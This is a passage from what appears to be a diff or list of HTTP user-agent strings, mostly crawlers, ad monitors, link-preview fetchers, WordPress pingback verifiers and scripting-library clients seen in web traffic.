https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613004769-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613010057-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613014429-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613014428-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613037501-0 +WhatsApp/2.21.4.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613054006-0 +WhatsApp/2.21.2.19 A +WordPress/5.6.1; https://wolypop.online +Mozilla/5.0 (Linux; Android 5.0.2; SM-G920T Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Mobile Safari/537.36 DareBoost +WordPress/5.6.1; http://www.injurylawyerhoustontx.xyz +HTTPClient/1.0 (2.8.3, ruby 2.3.3 (2016-11-21)) +SimplePie/1.5.5 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20200501122314 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +WordPress/5.6.1; https://rucore.net/p +WhatsApp/2.2104.8 N +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613091576-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613091597-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613092250-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613100274-0 +WhatsApp/2.21.4.7 A +WordPress/5.6.1; https://fastusaproxy.com +WordPress.com; https://iamcatherinel.wordpress.com +WordPress/5.6.1; https://chiptuninger.com +UnityPlayer/2019.4.7f1 (UnityWebRequest/1.0, libcurl/7.52.0-DEV) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4409.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6; https://askandroidquestions.com +WordPress/5.6.1; https://tutorialwordpress.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613178406-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613178615-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613186419-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613190049-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613190064-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613210330-0 +FlorKz./Nutch-1.14 +WhatsApp/2.21.4.8 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) adbeat.com/policy Gecko/20100101 Goanna/4.7 Firefox/68.0 PaleMoon/28.17.0 +WordPress/5.6.1; https://mentabee.com/se +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.143 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.143 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +GoogleAuth +GoogleAuth/1.4 (y2q RP1A.200720.012); gzip,gzip(gfe),gzip(gfe) +FlorKz./Nutch-1.2 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 7.1.1; SM-G600FY ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210212.163003 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1613311984-60 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1613311982-0 +Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210215.221910 +python-requests/2.7.0 CPython/2.7.9 Windows/7 +WordPress/5.6.1; https://retromedia.pl +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.15.2.el7.x86_64 +WhatsApp/2.2104.9 N +Mozilla/5.0 (compatible; spbot/3.0; +http://www.seoprofiler.com/bot ) +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 7.1.2; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613406515-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210215.143850 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210215.143850 +FDM/6.13.4.3616 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613436534-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_171 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613454204-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613503940-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613436745-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613441273-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613444747-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613444752-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210216.015533 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.175 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210216.142218 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613500395-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613500400-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613507489-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613507572-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210216.184302 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.163Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Mobile Safari/537.36 PTST/210216.191555 +WordPress/5.5.3; https://da.digitaldepo.cz +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210216.191555 +Offline Explorer/2.5 +WordPress/5.6.1; https://bitlab.com.br/bitwiki +WordPress/5.6.1; https://thecybermaven.com +WordPress/5.6.1; https://www.black-hat-seo.org; verifying pingback from 144.168.157.147 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210216.191555 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613542365-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613588435-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613524434-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613533148-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613536745-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 9; SM-C111 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613554240-0 +WhatsApp/2.21.30.20 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613560191-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613560213-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613560194-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +WhatsApp/2.21.1.11 A +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1613600567-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210216.191555 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.175 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1613535479-60 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1613535475-0 +WordPress/5.6.1; https://andoridru.site +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd9KWwjOnsLu5NfGXp4f5a4pdLHcLa4) +WhatsApp/2.2104.10 N +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.187 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.3.15 A +WordPress/5.3.6; http://rworld2.brookesblogs.net; verifying pingback from 54.37.131.137 +WordPress/4.5.2; https://www.arttik.com.tr; verifying pingback from 176.212.36.177 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613655251-10 +WhatsApp/2.21.4.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613669636-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613685267-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613608751-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613616064-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613633576-0 +WhatsApp/2.21.4.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613658477-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613676779-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613683268-0 +Screaming Frog SEO Spider/14.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613690367-0 +Snapchat/10.65.3.0 Beta (GM1915; Android 10#2010092151#29; gzip) V/MUSHROOM +RadiosNet/2.5.2 (Java; Android) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/61.0.3163.100 Chrome/61.0.3163.100 Safari/537.36 PingdomPageSpeed/1.0 (pingbot/2.0; +http://www.pingdom.com/) +WhatsApp/2.21.3.19 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.188 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.1; https://hack2know.how +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613702027-0 +WordPress/5.6.1; https://katherineheiglcollection.com +WordPress/5.6.1; https://eurolearnit.org +WhatsApp/2.21.4.14 A +Mozilla/5.0 (Windows NT 6.1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613695665-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613699899-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613705085-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613705087-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.199 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.175Safari/537.36 +WordPress/5.2.2; https://libtq.azurewebsites.net +WordPress/5.2.2; http://libtq.azurewebsites.net +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.2; Micromax_Q4101 ) U2/1.0.0 Mobile +Python/3.8 aiohttp/4.0.0a1 +RadiosNet/2.2.3 (Java; Android) +WhatsApp/2.21.4.15 A +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +LCC (+http://corpora.uni-leipzig.de/crawler_faq.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613853894-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613784654-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613790941-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613793071-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613819261-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613830417-0 +GuzzleHttp/6.5.1 curl/7.29.0 PHP/7.3.24 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613854310-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613854326-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613854319-0 +WordPress/5.6.1; https://stroynietela.ru +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1613805156-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 4.2.2; GT-I9082 ) U2/1.0.0 Mobile +Lynx/2.9.0dev.6 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/1.1.1j-dev +WordPress/5.2.9; http://tincongnghe24h.net +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.201 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/4.6.20; http://blog.australc.cl; verifying pingback from 103.134.255.109 +WordPress/5.6.1; https://www.engeniustech.com; verifying pingback from 198.167.141.113 +WordPress/4.4; http://gardenguesthouse.nl; verifying pingback from 176.212.36.177 +WordPress/5.6.1; https://decryptinfo.com +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613933468-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613867659-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613872516-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613873001-0 +Java/1.6.0_05 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613884914-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613884920-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613912826-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613931875-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.175 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 4.4.2; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.202 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.1; http://schissdreckschwaetze.de; verifying pingback from 144.168.157.193 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.202 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613998017-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613998019-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614015919-10 +GuzzleHttp/6.3.3 curl/7.29.0 PHP/7.2.34 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614027958-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614035350-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613989303-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613989291-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614001226-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614001234-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) anywhere.app/8.1.9 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614029671-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614029674-0 +WordPress/5.6.2; https://stroynietela.ru +WordPress/5.6.2; https://crack-forum.ru +WordPress/5.6.1; https://tazovod.ru 